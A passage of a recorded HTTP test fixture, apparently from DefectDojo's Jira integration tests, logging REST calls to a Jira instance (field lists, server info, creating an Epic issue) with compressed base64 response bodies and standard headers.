200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - b977a2c3b5dc5490 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:15 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a086c4f6-5ec5-4c92-b487-a67006336964 + x-envoy-upstream-service-time: + - '69' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "weekly engagement", + "description": "weekly engagement", "issuetype": {"name": "Epic"}, "customfield_10011": + "weekly engagement"}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '182' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10614","key":"NTEST-462","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10614"}' + headers: + ATL-TraceId: + - 096b76ed5b7c162a + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:15 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 186379d1-aa04-4ece-9bae-acd4e9a31157 + x-envoy-upstream-service-time: + - '354' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-462 + response: + body: + string: !!binary | + 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 + 27Z3AAAA//8DAMhKk9XaFgAA + headers: + ATL-TraceId: + - ec7ebebc23d97d3d + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:15 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 44a5d12c-f5bb-4e6f-9858-8aebd7d72bb2 + x-envoy-upstream-service-time: + - '176' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJNum2uYkeVGQV2j2JSNpOsJImpU2FZdn/boKL623em+/N + Y06k1QseZksU+QxhWtRm06PBLvT+y1MdrF6WQTvqMJCMfOO8DN5FmAEwChTyen/7Wj+8NNftfh3b + OBH1lqAMMnjPSI+T9ccRXWiOE8YDd9avfQy162D73whRKSDFxbzXIYEcOMuB57xoGFN8p7aCAsAN + RDjmF5xjbzOMV3abA2s4KCEVK2hZln9sNz464yMoCil3hhmDKMqqMlokjZrteCFLHgWXXVVU/wqC + TQ1Pw6xJesfo1YZn3+lkn4i9TATdx6Em5/MPAAAA//8DAInjG9BaAQAA + headers: + ATL-TraceId: + - 824f98e427df1e63 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:16 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 82f8894f-2b9f-43ee-a2c3-51a23c2056db + x-envoy-upstream-service-time: + - '28' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 0bd53e3bf6129e39 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:17 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 280a3ef0-a06b-46e9-8c53-8ca8d92671c0 + x-envoy-upstream-service-time: + - '68' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 